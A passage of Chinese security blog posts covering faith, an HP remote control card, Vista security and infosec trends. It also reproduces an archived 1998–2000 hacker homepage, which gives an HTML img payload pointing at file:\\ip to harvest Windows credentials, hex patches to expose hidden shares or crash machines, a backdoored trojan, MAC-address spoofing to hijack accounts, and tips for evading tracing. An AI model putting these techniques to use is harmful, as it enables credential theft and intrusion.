http://hi.baidu.com/tombkeeper - 选录
百度空间
共 164 篇文章
信仰
2008-12-02
2005.10.23
闲聊时, San的媳妇曾说过她上党课时的事儿:
老师问学生:“我们现在有了有了资本主义社会才有的剥削,有了资本主义社会才有贫富分化,资本主义社会才有的失业……那么,作为共产党员,我们还有什么?”
台下一片沉默。
老师缓缓地说:“我们还有信仰。”
什么是信仰?信仰就是坚信无法被证明一定存在的东西。如果一个事物被证明是切实存在的,或者很容易被证明的,那对这个事物的相信就不能算信仰。
譬如说,Star找我借二十块钱买冬储大白菜,说好明天还。我借给他,这叫信任,不能叫信仰。因为:1、还不还我明天就能知道;2、即使不还我的损失也不大;3、我能揪着脖领子抽嘴巴子逼他还钱。而樊于期把脑袋借给荆轲,相信这样就能杀秦王,差不多就是信仰了。
信上帝的人何曾尝过吗哪遍野?信弥陀的人何曾见过天花乱坠?我们无法证明神的存在,也同样无法证明神不存在。所以有人相信神存在,有人相信神不存在,这都是信仰。坚定的信是一种信仰,坚定的不信也是一种信仰。信仰可以给智者力量,给愚者安慰,让人们更加快乐地度过一生,是个好东西。
前阵子看到一篇5cent文章,说马克思生活腐化,对燕妮不忠,那么这样一个人搞出来的理论必然是错误的,扯淡的,云云。
以生殖器相关的事物为论据,来论证某人的其他所有方面都不可靠,这是极有中国特色的逻辑学。 阴人先从“生活作风问题”入手,也是典型的中国功夫。而且这门功夫一千多年前就有了:某人看陈平不顺眼,跟刘邦打小报告,说陈平长得帅,根据中看不中用的原则,可以得出他必然没有才能的结论。更为严重的是,陈平年轻时候有“盗嫂”行为,所以人品差,所以必然不能担当大任,云云。
“马克思生活腐化”之说也不知那5cent怎么琢磨出来的,反正文章里没说出处。不过这个事儿的真假并不重要。拿破仑颇有几个相好的,法国人并没有因为这一点,就把他打倒在地再踏上一只脚;或者讳莫如深,家丑捂到烂。反而把他的写给情妇们的情书印刷出版,引以为豪。爱因斯坦、薛定谔,私生活都有确定无疑的问题。以至于有部话剧叫“薛定谔的情人”。可没听说有人因此就不信相对论,怀疑波动方程。这招“生活作风一阳指”,也就在中国还有点市场,算是 程朱 这两个老阳萎给我们留下的宝贵遗产。
其实我还真挺希望这是个真事儿:有壮阔的历史背景,豪华的人物阵容,再添点香艳的情节,交给琼瑶阿姨,怎么也能拍个百八十集的。
从AMT想起去年买的HP TopTools Remote Control Card
2008-11-27
硬件的进步速度绝不仅仅是一个摩尔定律。CPU的NX技术,在2001年之前,只有一些贵得要死的Unix服务器才有。而现在,随便买台PC,都有这个功能。过去,服务器一瘫痪,想解决问题就得跑机房。后来一些服务器厂商提供了Remote Control Card,倒是可以实现从BIOS启动画面开始的远程控制,但同样贵得要死。而现在INTEL已经将Remote Control Card的功能集成进了芯片组和CPU。也许不久后,每台PC都会有这个功能。不可避免的,也会出现相关的安全问题。这可比任何Rootkit都更Rootkit。
Intel官方关于AMT技术的介绍:
http://www.intel.com/cd/network/connectivity/APAC/ZHO/217823.htm?iid=tech_amt+zho
Radmin新版本也将提供对AMT的支持:
http://www.radmin.com/products/radmin/radmin_with_intel_amt_demo.php
看到AMT,使我想起了去年在一个卖二手服务器配件的店里看到两块HP TopTools Remote Control Card,不过店主并不知道那是什么东西,于是我以便宜得惊人的价钱买了回来玩。卡是买回来了,但是完全没接触过类似的东西,便先找文档资料。谁知网上关于HP TopTools Remote Control Card使用方面的信息极少,只能一边试验一边摸索。
首先,要把这东西跑起来。根据HP官方文档《HP TopTools Remote Control User Guide》上说,卡和主板之间是通过一根I2C-IPMB电缆进行连接的。而这种电缆我根本买不到,只能自己做。我带着卡,在电子市场跑了一大圈,总算找到了合适的接插件。制作了一根I2C-IPMB电缆:
连上主板,加电,总算顺利跑了起来。
这个卡实际上就是一台小小的嵌入式系统,自己起了一个HTTPD,可以用浏览器连上去查看系统状态、诊断、远程控制、甚至远程安装操作系统。从板子上看,应该是ARM+FPGA架构的。分析了Firmware,里面跑的VXWorks——HP就是HP啊。
我升级到了最新版本的Firmware之后,对远程管理界面进行了简单的测试。
管理界面虽然是WEB的,但实际上大部分功能都是JAVA Applet实现的。登陆认证过程用了加密,挑战响应,所以不必担心口令安全问题。不过除了口令外,其他数据都是明文传输,相当于telnet,所以尽量不要通过不可信的网络在这个控制台上进行可能包含敏感数据传输的操作,譬如登陆操作系统。
进一步对管理界面进行测试,发现不少漏洞 。不过好在这个东西太小众,所以应该没啥大影响。
另外,B.01.08版本的Firmware,会监听3/TCP端口,而更高版本则没有,很诡异,不知道是不是留的调试接口。
远程控制功能还是比较COOL的,从BIOS到GRUB都能控制:
我简单分析了一下远程控制的实现原理。这个和RDP、VNC之类不同,传输的并不是图像,而是字符信息。估计是从哪个中断直接读了VGA的数据。这样做的好处是对带宽的要求很小,坏处就是仅能支持VGA控制台模式,不支持Framebuffer的控制台模式,GUI就更不行了。这就带来一个应用上的问题:Debian虽然仍然顽固的坚持字符安装界面,但为了支持多国语言,还是用了Framebuffer。所以无法用这个东西来远程重装系统。我于是强行把Debian安装程序的initrd中Framebuffer模块给删掉了,这样虽然只能显示英文,但是远程重装系统就没问题了:
信息安全走向漫谈(三)
2008-11-27
上接 http://hi.baidu.com/tombkeeper/blog/item/0016a1b701ac31f331add1ce.html
Vista是个纸老虎
很多搞Windows安全的人最近都着实被微软的Vista给吓着了,觉得以后Windows就安全了,没什么可搞了。微软号称这个系统比前代大大增强了安全性。不过大家别忘了,微软推出Windows 2000的时候是这么宣传的,推出Windows XP的时候是这么宣传的,推出Windows 2003的时候也是这么宣传的。
当然,实事求是地说,从我们最近一段时间对Vista Beta版的研究来看,这个新系统的确采取了很多新的安全特性,大大增加了传统漏洞的利用难度;新的开发过程和开发工具也的确降低了漏洞发生的几率,比起之前的产品在安全上可以说有一个大飞跃。
但关键问题是:人们真的会接受这样一个用大量确认窗口和限制措施来虐待用户的操作系统么?更别提可怕的资源占用和乌龟般的速度了。至少我是绝对不会用这个东西的。估计在Vista正式上市后,各种Windows优化软件肯定会立即提供关闭这些安全特性的功能。
信息安全,信息为肉,安全为骨。肉无骨则不立,骨无肉则不活。蚯蚓之类,只有肉没有骨,尚可以慢慢蠕动,可以不太精彩地活下去;但是没有肉,光剩骨头,什么动物也活不了。安全措施对用户的扰动越小,就越容易被接受。时刻发挥作用,却几乎感觉不到它的存在,这就是安全工作的至善境界,也是最难达到的目标。要不然为什么杜雷斯的超薄型卖得贵还那么受欢迎。
在我看来,Vista就是个至少一厘米厚的杜雷斯。
任何企业的目标都是挣钱,只有当维护用户安全和挣钱这个目标恰好吻合时,它就会设法增强用户安全,如果 维护用户安全影响了挣钱这个目标 ,它一定会考虑重新调整两边的砝码。
今天我在这里关起门来做个大胆的预言:Vista终将成为一个类似Windows ME那样没什么人愿意用的失败产品。微软甚至可能会在Vista后续的Service Pack或者下一代操作系统中取消或者减弱一些影响用户体验的强制安全特性。
另外,这个一厘米厚的杜雷斯是否真的就比0.03mm的超薄型安全333.33倍?值得怀疑。Windows 95只有1500万行代码,Windows 98有1800万行代码,Windows XP 有3500万行。Vista 则有5000万行,比XP多出了40%。新代码带来新功能,同样,新代码也必然会引入新漏洞。
毛主席说过,“一切反动派都是纸老虎。看起来,反动派的样子是可怕的,但是实际上并没有什么了不起的力量。从长远的观点看问题,真正强大的力量不是属于反动派,而是属于人民。”在我看来,Vista也很可能是个纸老虎。假以时日,纸老虎的软裆必然会被一一发现。
退一步讲,即便Vista、Fedora Core等为代表的新一拨操作系统真的是一个漏洞都没有了,从整体上看,信息安全态势仍然不乐观。
信息安全走向漫谈(二)
2008-11-26
上接 http://hi.baidu.com/tombkeeper/blog/item/6a6e918b9223b3d4fd1f10bc.html
2、信息安全的未来如何?
最近一两年,大家感觉信息安全形势比前两年要好些了,不再像2002、2003年的时候,漏洞满天飞,蠕虫 遍地爬 。于是有人开始担心:漏洞少了的确有利于信息安全,但这样下去,最终会不会导致我们失业?
对此我是这样看的:信息安全技术的发展将来一定会有技术方向上的变化,但不会有前途上的问题。
电影《笑傲江湖》中任我行说:“有人就有江湖 ”。从有马帮的那一天起,就有马贼;从有海船的那一天起,就有海盗。有盗贼怎么办?理论上靠官府,实际上靠自己。自己搞不定怎么办?花钱找镖局。几千年来,什么时候这个格局改变过?过去镖局保的是金银,今天我们保的,归根结底也还是金银。从这个意义上讲,我们这个行业其实是镖局发展进入信息时代后,出现前面说的“技术方向上的变化”,而化生出来的。
所以,只要人类社会还存在信息交换行为,只要这些信息交换涉及到利益,就会有人试图改变这些利益的分配规则,就会有对信息安全的需求。百川归大海,这是一个根本法则,不管中间怎么九曲十八弯,最终,这个根本法则是不会有什么变化的。
大家感觉信息安全形势比前两年要好,可能一个主要原因就是看到软硬件厂商对安全越来越重视,安全措施越来越多。而看起来,比较严重的安全漏洞似乎有减少的趋势。互联网上几乎每台机器都有防火墙保护。新的Fedora Core默认开启了Linux的很多安全特性,而且看起来以后会一直这样下去。微软将要发布的Vista也似乎是一个强健无比的系统。这一切仿佛都在暗示信息安全会成为一个历史阶段性的事物,随着安全形势的进一步好转,这个行业也会逐渐淡去。
下面我们具体来谈谈这些问题。
下接 http://hi.baidu.com/tombkeeper/blog/item/6cbed55cd1d66d44faf2c0ee.html
yuange和ms08-068的历史和八卦
2008-11-14
外面说ms08-068是七年半,实际上的确不止。 yuange说他发现这个问题时的最早记录是2000.3.16 ,我帮他刷新一下:至少在2000.1.15,yuange的主页上就提到了这个问题。另据某人考证,至少在1996年的时候MIT的人就发现了这个问题。Blackhat 1997上也有人讲。也就是说,这个漏洞从为人所知到修复,至少是12年。
那为什么现在忽然修复了呢?很简单,修复漏洞得花钱,据说微软修复一个漏洞前后要花300W刀。如果漏洞的没有被广泛利用,没有造成很大的影响,为啥要花这个钱呢?所以我很赞成某人的观点:这次微软动手修复,应该是因为metasploit出了一个好用的工具smb_relay.rb。smb_relay.rb的原理相当于SMB反弹重放+psexec,所以很黄很暴力很爽很好用。虽然这个漏洞威力强大,但是因为年代久远,当年又没有出过好用的工具,所以新人不知道,老人都忘了。
说起来,这个很黄很暴力很爽很好用的攻击方案当年yuange也想到了。一开始的设计的攻击方案需要双网卡,后来我琢磨也许可以借助VMWare的虚拟网卡,还一起测试过。印象最深刻的是,6年前看着yuange用这个办法,psexec了后来成为奥运志愿者的某同志的机器,看到在D盘根目录下存放着的某位女同事的照片 。桃花小郎君听说此事后,对yuange从此就十分忌惮。
我是一个有考据癖和收藏癖的人,yuange的主页自然是不会放过的。所以至今仍存有当年yuange在杭州天丽鸟空间那个主页的mirror。这里面的页面在互联网上恐怕已经完全找不到了,用万能的google也不行——估计连yuange自己的硬盘上都没有了 。
现在江湖上混的,可能很少有人见过当年这个虽然简陋难看但威力无穷充满邪恶知识的页面。特此向大家展示一下这个我多年的收藏:
技术资料栏目加入WINDOWS中断调用、PCI总线资料下载和我分析WINDOWS的TCP/IP、NETBIOS协议程序反汇编代码下载,有简单的注释还有几个漏洞注释。向你推荐栏目目录中文名改成英文名,SOFT-ICE、SOURCE7可以下载了。2000。03。24
技术资料栏目加入两篇文章,系统漏洞加入一个攻击WIN9X的程序下载,程序很小128字节。2000。03。23
对不起大家,原来的共享目录密码BUG补丁有问题.有个东西搞反了,所以实际上是没补上,只是对付我那攻击程序可以用,不过请你放心绝对没有增加BUG.有空改好大家再重下吧. 2000。01。15
说说我发现的一个新漏洞的应用吧,我发现NT系统一样有,还有并不要等到出来密码提示时早就发出自己的密码了。WINDOWS系统访问用户权限的机器的时候把自己的用户名密码等发出去,这可以借助邮件、主页等主动窃取密码。 主页或者邮件里面来个 <img src="file:\\ip\dir\filename" BORDER="0" HEIGHT="0" WIDTH="0"> 那filename弄个没有的文件名,不看原文件谁也不知道有这么个东西。IP是自己的IP,再借助现成的LOCKDOWN可以很方便的知道收件人(对于邮件)的IP、机器名、用户名,如果编一下程序或者用NETXRAY还可以得到可爱的密码(加密的,但可以离线破解,别人一点不知道),对于个人系统如果是NT系统那有了用户名和密码一般的机器都是你自由控制了。2000。01。15
昨天看程序看到WINDOWS系统访问用户级安全系统(NT系统 就是以用户级安全控制,WIN9X一般是共享控制),提示输入密码时,如果不输入密码(我们登录别人的系统不知道密码时往往要试试直接回车)系统自动用登录WINDOWS的用户名、密码登录,这就泄露了密码。这是不是也是破解屏保密码的一种方法呢?(一般屏保密码就是登录WINDOWS的密码)。不知道NT系统有否此漏洞,如果有那就。。。!1999。12。29
今天又有收获,WINDOWS的共享名后面加"$"就看不见,没想到这是在客户端处理的服务端根本就没处理。好了,现在远程管理(共享名ADMIN$),还有别的加$的共享保护都没用了,访问别人也方便多了,特别是有远程管理功能的机器一目了然,是不是很爽!破解方法是系统目录下的MSNP32。DLL文件找到16进制码8B 74 24 10 6A 24 56 E8 改成8B 74 24 10 6A FF 56 E8 就可以了。注意这文件始终是打开方式,所以你可以复制一份,修改,启动到DOS,再覆盖原来的,再启动。我公布了共享密码校验漏洞后很多人想到用共享名加“$”保护共享让你看不见不知道共享名所以也就没法破,看来这方法也失效了!1999。12。28
刚刚又发现WINDOWS的一个BUG,就是网络文件句柄范围没有检测。利用来攻击WIN95,98,98-2死机不成问题。漏洞还是NETBIOS的,影响内部网,如果TCP/IP协议绑定了NETBIOS那么可以远程攻击,也就是常说的139端口。 还有有可能利用来入侵,我正在加紧分析此漏洞的影响,希望能找到方法入侵。 欢迎大家经常来访问我的主页,说不定哪一天你就发现我的主页公布不用木马入侵没有共享目录的WINDOWS机器方法呢。 1999。12。27
大家很喜欢NETXRAY,把新的3.03版弄上去了,已经解密好了的,不用大家再自己动手了.还是在向你推荐栏目下载,注意记下序列号! 1999。12。22
这两天有空闲也有心情看WINDOWS程序了,竟然又有一收获。就是SMB的COMMAND 73、75命令没处理好,造成访问网络文件时可以攻击死机。刚试了下WIN2000没想到也死了。1999。12。18
作了个自动修改VREDIR.VXD的程序,可以支持WIN98,WIN98-2,可能还支持WIN95等,大家可以去系统漏洞下载.还有那木马也改了成支持多版本的.那\\IP\AAA的木马也作了修改,支持多版本,文件MUMA4.EXE可以去网络黑客下载.1999。12。8
网络共享访问BUG检验办法:如果你是WIN98,你DEBUG C:\WINDOWS\SYSTEM\VSERVER.VXD D 2B60 如果是 3C 01 75 24 改 E 2B60 33 C0 C3 写 W 退出 Q 再重启动,好了,现在你可以共享一个文件夹加上密码。你去找别的WINDOWS机器访问这个共享目录,这WINDOWS机器一串非法操作出来了,一般就死机定了。 1999。9。31
做了个木马,大家可以去网络黑客下载。此程序修正了WINDOWS98的共享目录密码校验BUG,但又开了一个后门,可以完全访问C盘,这木马很难发现的,因为没有修改注册表,INI文件,没有增加文件,没有开服务。 1999。8。25
好久没有更新主页了,今天放上共享目录密码校验BUG的补丁。还有告诉大家一个好消息,我又发现一个BUG,就是可以让别人访问共享目录出现非法错误可能导致死机,这可以利用来保护自己的共享目录,发现别人用那密码校验BUG攻击就反攻击惩罚一下。以后再仔细写利用这BUG的程序吧。 1999。8。21
技术资料加入了我的几篇新文章。还有一个自动画各种美妙曲线的程序,才50来K,很好看的。还有ARP协议也不怎么好,可以借此让自己内部网的机器访问不了别的机器或者上不了INTERNET。这可以攻破别人网络一台机器而轻松的使他的整个网络瘫痪。内部网真是太没安全了,而这就造成内部网的一台机器不安全所有的机器都没安全可言了。 1999。4。23
可以进入有密码的WINDOWS95,98共享目录。
好久没有更新主页了,不过又有收获,前段时间我又发现WINDOWS一个BUG,可以进入有密码的共享目录。如果他的机器开放了139端口,你可以用\\IP 远程访问他的共享目录的,所以这点还是影响很大的。可是微软竟然对他们的产品,他们的客户这么不负责任,我发几次妹儿报告我发现的两个BUG都没回信。欢迎大家到系统漏洞去下载利用我发现的漏洞的驱动程序。1999。2。1
对内部网蕴藏自己的IP。
大家都知道,在自己的机器上运行WINIPCFG,查看控制面版\网络\TCP/IP协议,在别人的机器上PING,NBTSTAT 等都能查看到你使用的IP,但有时网管不让用有些IP,那怎么办?前面我们已经有了用别人的IP的方法,但那样会被查出你用的IP,所以就知道你在不听话了。那有什么办法呢?我们解决一个问题就该先看这个问题是怎么的,可能大家都知道IP是不能直接通信的。直接通信是靠MAC。一个机器要与内部网的机器用IP通信,就得知道其MAC,它会广播“我的IP是XXX。XXX。XXX。XXX,我想知道YYY。YYY。YYY。YYY这个IP的网卡号(MAC)”,ARP协议就解决这问题。那我们不就有了很简单的解决办法了吗。收到广播要得到MAC,先看看你是谁呀,是路由器吗?不是路由器我可不能告诉你我的MAC,那样别的机器得不到你的MAC,将会查不出你的机器来。还有一个根据MAC查IP的协议,因为你提供了网上邻居等一些协议,内部网可以知道你的MAC,可以根据这查到你的IP,相应的这也处理掉。这下就剩自己机器上的一些暴露自己IP的地方了。改VP。386驱动,不丛注册表取IP,那样TCP/IP协议里的IP可以随便填了,还有WINIPCFG取IP时返回一个假的给它。好了,现在别人(内部网的人,躲外部网查看你的真IP的方法是登录代理等跳转)不知道你的IP了。还有我们用IP开机就在网上了,别人随时可以攻击你,这点不好。我们可以做个开关,可以随时断开随时连上,还有换IP时,大家都是改TCP/IP协议里的再开机,多不方便呀,我还想上网中随时换我的IP呢。~_~ 前面的改法也使这两点很方便的就解决了。 1998。12。16
不用代理实现内部网共享IP。
大家都知道内部网可以用代理实现IP共享,可是我们有时不想用代理(没代理软件,服务器,代理要收费),我们是不是可以考虑不用代理实现IP共享呢!大家想一想,一个机器可以开很多浏览窗口也正常使用,那就是协议中已经提供了接口了。好,让我们来把两台机器的IP改成一样,开机一看报告IP冲突!我们想一想IP通信的协议就知道该冲突的了,改一个机器的网卡号为另一个机器的(我们尽量只改一个机器的东西,让另一个机器什么也不改还要它不觉得有鬼!~_~大家知道这是什么意思了吧!)再开机,哈哈,不冲突了,赶快上网一试!可是两个机器都报告断开与服务器的连接,只有一个机器开的时候可以上网。其实这一步也有用处了,别人不在我用他的IP正常上网,即使他来了也不报告有冲突,他也不知道我在用他的IP。
看来两个机器收到包没分清哪个是自己的。我们仔细想想一个机器是怎么区分数据是哪个窗口的,原来是有个端口(有的叫套接字,SOCKET),每次连接得分配一个端口,数据被定位到端口(就是对应应用程序,甚至应用程序的窗口)。不是那个端口的它不处理。但是现在是两个机器呀,两个机器也不知道另一个机器分配到多少了。那就干脆改吧。还是改一个机器的,找到MSTCP驱动程序了,那里分配端口。MSTCP程序为TCP协议(IP是它的上层协议)分配了0X401--0X1388的端口,改一个机器为0X7401--0X8388,应该没有与这个机器的别的协议冲突,还有包序数什么的。重起开机上网,还是断开与服务器的连接。这回怪了,想想数据发出去,接回来分发到应用程序都没问题的了。打开NETXRAY,拦截本机与实验服务器的IP通信。仔细查看,原来在连接握手的3次通信时,另一个机器也接收到了服务器的握手通信,但它没有要求建立连接,所以它就发了一个连接复位的包,造成连接中断。这点处理有点和TCP连接后的处理不一样,TCP连接后的数据包机器接收到不是自己的包只是简单的丢掉不处理。这点要只改一个机器还很不好办。可以改自己的机器收到不是自己要的握手连接包不发复位包。这样另一个机器就完全不受影响,但有它这个机器就连不上了。可以再改改这个机器的一些东西,让别的机器查不出这个机器的IP,以便更加安全(如果是盗用最好机器名改改,或者改改驱动软件只对网关(路由器)的包回复,但别人知道了高手也可欺骗你的哟。也得注意如果是WIN95,98,两个机器名一样了,还有都装了IPX/SPX的话就小心死机了,这是前面说的NMPI协议BUG)。对自己的几个机器想共享那好办,机器都改改握手复位的地方就是了。 还有一个问题就是一个网卡配多个IP,解决代理服务器要几个网卡等问题,大家可以自己实验以在实践中提高自己的水平。其实这肯定是能实现的,好象有这样的软件了吧!。1998。11。25
我昨天又发现一个网络大BUG,在同一网段可以弄死别人的机器
SMPI协议端口收到一个名字服务包(类型0x14),如果网卡号,机器名和它自己一样就死机!一般不会收到这样的包,因为网卡号不一样,但攻击程序可以获得你的机器网卡号,机器名来攻击的!我不知道原来发现这BUG没有,也不知道到底影响哪些版本! 1998.11.20
很多人下载NETXRAY不成功,要求我给妹儿,那文件实在太大,所以没法妹儿。原来向你推荐里面的连接是国外的,也不支持断点续传,所以大家老不成功。在此我也花了点时间把文件传到我的主页服务器上了,还是在向你推荐栏目里面下载,不知道现在大家能不能下载? 大家不要在实用软件栏目下载太大的软件,那也可能太大了的文件下不了!
1998。10。04
一般网卡可以接收广播地址和自己的网卡地址的通信,现在很多设备都支持网络管理,网卡也能通过编程接收所有的地址,像我推荐的网络报文分析软件NETXRAY就可以看到同一网段的所有通信,我猜只能是用此方式了。此方式的资料没有,只有有时间去分析这NETXRAY了!到时那就很方便了!
还有INTERNET上的通信改路由用假IP是一个方法,但太大的网路的路由被改可能很容易被发现,发现了可能麻烦太大。所以方向还是不改路由或者改很小范围的路由,而主要通过主机跳转来保证安全。这只是在别人的机器上留下了假IP地址或者是你最后跳转的主机的IP,别人后来查看就只得到这IP不能知道你是谁了。当然如果进去了可以也清理掉这痕迹。 但是如果别人当时发现你,他可以跟踪路由发现你的地理位置,所以一要干净利落,二要查看到别人的跟踪马上退出。这又有个问题了,怎样发现别人的跟踪?
1998。09。14
很多人来访问我的主页,想得到网络帐号盗用的程序,可我没时间写,为了不让大家有白来一趟的感觉,我特地把我的帐号盗用的原理说出来,让大家也算有一点小收获吧。还有一个大家要学会去想,去领会这些思想,我相信这些比单一的程序更重要。通过我的一些技术方面的文章,指引大家自己去想自己去获得,这也可说是本站的一个目的吧。有哪一位高手有空也不妨替我写出程序来,即锻炼了你的编程技术也方便了众多网友,那就谢了。
网络认证后的凭证需要加强!
袁哥
一般帐号登录先有个认证,这很多是密码认证。认证过后双方有了一个凭证,以后通信就用这一凭证。这一凭证是什么内容,容不容易伪造就直接影响到以后通信的真实性。
可是网上很多系统的这凭证内容真不敢恭维。比如NOVELL,凭证内容就有网卡地址,连接号(USERLIST列出的数字,在每个工作站都可以得到任何用户的连接号。),还有就是通信套接字,包序数。其实后两项只是应用程序需要的内容。大家一看就知道这凭证的伪造的关键是网卡地址了。其实原来可能很多人都想到的,改网卡号可以截获别人的包,可是可能很多人听说网卡号是唯一的也就罢了,包括我原来也这么认为。但我们仔细看看网卡到底是怎么的,不看不知道,看了吓你一跳!原来大多网卡网卡号也是可以编程的。这就显然帐号可以冒用了,等别人密码认证过后,马上改自己的卡号连接号等为别人的,你就可以以他的身份与服务器通信了。这就冒用了别人的帐号了。别人的网卡号的获得相信你在每个工作站都能轻松的获得的吧!
这看起来好象不该怪系统,怪网卡怪网卡里面的程序,你为什么要提供网卡地址的编程呢?但我们仔细想想,你的服务你的认证,怎么能轻易拿别人来作为凭证呢?
有了问题,我们也该想想到底该怎么来解决呢?显然现在认证后的凭证是不能用别的硬件号什么的。即使大家的没法改,但别人也可以自己做一个自己专用的可编程的呀。这显然就只能是数字的凭证了,那数字的怎么凭证呀?这不是更好伪造吗?其实数字是能做凭证的,这就是现在很热的数字认证的内容了,在此也不多说了。
显然现在的WWW网也可以利用这一技术。这儿的路由器就好比是网卡,就看对路由器的掌握了。本人正找路由器的资料看,可惜很难找,有好资料的妹儿我。谢了!!
1998。09。10
我的主页访问记数猛增,我都有点觉得对不起大家了。很想马上写好程序,可我也要工作要学习呀。如果有有时间对WINDOWS编程比较熟的朋友想担当这一重任,可以妹儿我,我把技术问题告诉你,你帮我写出程序,也方便众多网友!先谢了。
1998。09。09 下午
我昨天实验盗用内部网帐号成功!看来网上很多认证得好好改一改了!我有空会编好程序的,你有空就来看看吧。到时大家要取得管理帐号,密码文件什么的就方便了!1998。09。08
我改好了WIN95下的3COM网卡的驱动程序,大家可以到网络黑客栏目下栽。1998。09。05
我发现网卡地址也可改的了,你可以在内部网络里干一点点不准干的事,也逮不着你了!技术方法等问题等我有空慢慢写出来让大家分享!你有空来看看哟! 1998。09。04
还有NETWARE的管理者的权限的获得,WIN95,WINNT本地随便登陆,等等。大家不时来看看吧,我会慢慢的加上我的很多好东东的!